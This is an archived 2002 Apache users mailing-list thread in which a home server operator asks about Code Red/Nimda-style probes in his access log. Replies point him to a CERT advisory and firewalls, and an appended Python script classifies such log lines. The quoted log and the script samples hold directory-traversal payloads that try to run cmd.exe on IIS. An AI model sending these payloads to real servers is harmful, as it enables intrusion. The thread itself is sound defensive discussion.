httpd-users mailing list archives

From "Steve Leach" <sle...@askalix.com>
Subject Re: access log
Date Fri, 19 Apr 2002 09:18:09 GMT
Robert,

I am a bit tied up at the moment but will send a mail back to you when
free - in the meantime, if you are using Apache on Win32 - check out the
http://www.apache.org site regarding redirect.

You really should not be directly connected to the Internet without a
Firewall, I would also recommend that you check out:
http://www.firewall.com and
http://www.free-firewall.org/
or more from http://www.homenethelp.com/web/howto/free-firewall.asp

or you could use an old cheap PC and build one using Linux - try
http://www.linuxsecurity.com/articles/firewalls_article-4236.html or more from
http://www.bolthole.com/solaris/firewall.html



Best Regards,

Steve Leach
Network Manager
Mi-Int Limited
Eaglescliffe Logistics Centre
Durham Lane
Egglescliffe
URL: http://www.askalix.com
TEL: 01642 356205
e-mail: sleach@askalix.com

----- Original Message -----
From: "Robert Douglass" <r.douglass@onlinehome.de>
To: <users@httpd.apache.org>
Sent: Friday, April 19, 2002 10:07 AM
Subject: Re: access log


> Steve,
> Thank you for the information. I'm not a trained system administrator, and I
> have to admit, I don't know what you mean, "try some checks on the input and
> redirect if you find any exploit attempts". I am on a Win32 system (2000
> pro).
> -R.D.
> ----- Original Message -----
> From: "Steve Leach" <sleach@askalix.com>
> To: <users@httpd.apache.org>
> Sent: Friday, April 19, 2002 10:55 AM
> Subject: Re: access log
>
>
> > This is Code Red or something like it.
> > See the following: http://www.cert.org/advisories/CA-2001-19.html
> > Note that Apache should be fine - also that if you are running *nix you are
> > OK.
> > If on a Win32 system you could try some checks on the input and redirect if
> > you find any exploit attempts!!!
> >
> > Best Regards,
> >
> > Steve Leach
> > Network Manager
> > Mi-Int Limited
> > Eaglescliffe Logistics Centre
> > Durham Lane
> > Egglescliffe
> > URL: http://www.askalix.com
> > TEL: 01642 356205
> > e-mail: sleach@askalix.com
> >
> > ----- Original Message -----
> > From: "Robert Douglass" <r.douglass@onlinehome.de>
> > To: <users@httpd.apache.org>
> > Sent: Friday, April 19, 2002 9:43 AM
> > Subject: access log
> >
> >
> > > Hello, I've been hosting a tiny website from my home for the past week, as a
> > > temporary project, and I found the following in my access log:
> > >
> > > "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> > > "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> > > "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > > "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> > > "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > > "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> > > "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> > > "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
> > > "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > > "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > > "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > > "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> > > "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > > "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> > > "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > > "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> > >
> > > Does anybody have an idea what someone was trying to accomplish with this,
> > > or if these requests may have originated from my ISP? Does anybody have any
> > > suggestions on how to implement some basic security (I've done nothing!) to
> > > protect myself? I'm using Apache 1.3.22. Thank you,
> > >
> > > Robert Douglass
> > >
> > >
> > > ---------------------------------------------------------------------
> > > The official User-To-User support forum of the Apache HTTP Server Project.
> > > See <URL:http://httpd.apache.org/userslist.html> for more info.
> > > To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> > > For additional commands, e-mail: users-help@httpd.apache.org
> > >
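As an added example (not part of the original messages), this Python script classifies access-log request lines of the kind quoted in the thread: it percent-decodes the target repeatedly to expose double encoding such as `%255c`, flags the bytes 0xC0/0xC1 that never occur in valid UTF-8, and reports whether the server refused the request. The function and label names are illustrative assumptions; four sample lines are taken from the quoted log and one benign line is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Sample input: four request lines quoted in the thread plus one constructed
# benign request for contrast.
SAMPLE = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311',
    '"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295',
    '"GET /index.html HTTP/1.0" 200 1024',  # constructed
]

REQ = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SHELL = re.compile(rb'(?:cmd|root)\.exe', re.I)
TRAVERSAL = re.compile(rb'\.\.[/\\]')

def classify(line, max_rounds=4):
    """Return (status, sorted findings) for one request line, or None if unparsable."""
    m = REQ.search(line)
    if not m:
        return None
    data = m.group('target').encode('latin-1', 'replace')
    rounds = 0
    # Percent-decode until the bytes stop changing; more than one effective
    # round means the target was encoded more than once (%255c -> %5c -> \).
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    findings = set()
    if rounds > 1:
        findings.add('multi-encoded')
    if b'\xc0' in data or b'\xc1' in data:
        findings.add('invalid-utf8')  # 0xC0/0xC1 never occur in valid UTF-8
    if TRAVERSAL.search(data):
        findings.add('traversal')
    if SHELL.search(data):
        findings.add('shell-probe')
    return int(m.group('status')), sorted(findings)

def report(lines):
    """List (findings, status, refused) for every request line that was flagged."""
    results = (classify(line) for line in lines)
    return [(f, s, s >= 400) for s, f in filter(None, results) if f]

if __name__ == '__main__':
    for findings, status, refused in report(SAMPLE):
        print(status, 'refused' if refused else 'INVESTIGATE', findings)
```

A flagged request answered with a 2xx status is the case worth investigating; the 404 and 400 responses in this thread show the probes were refused.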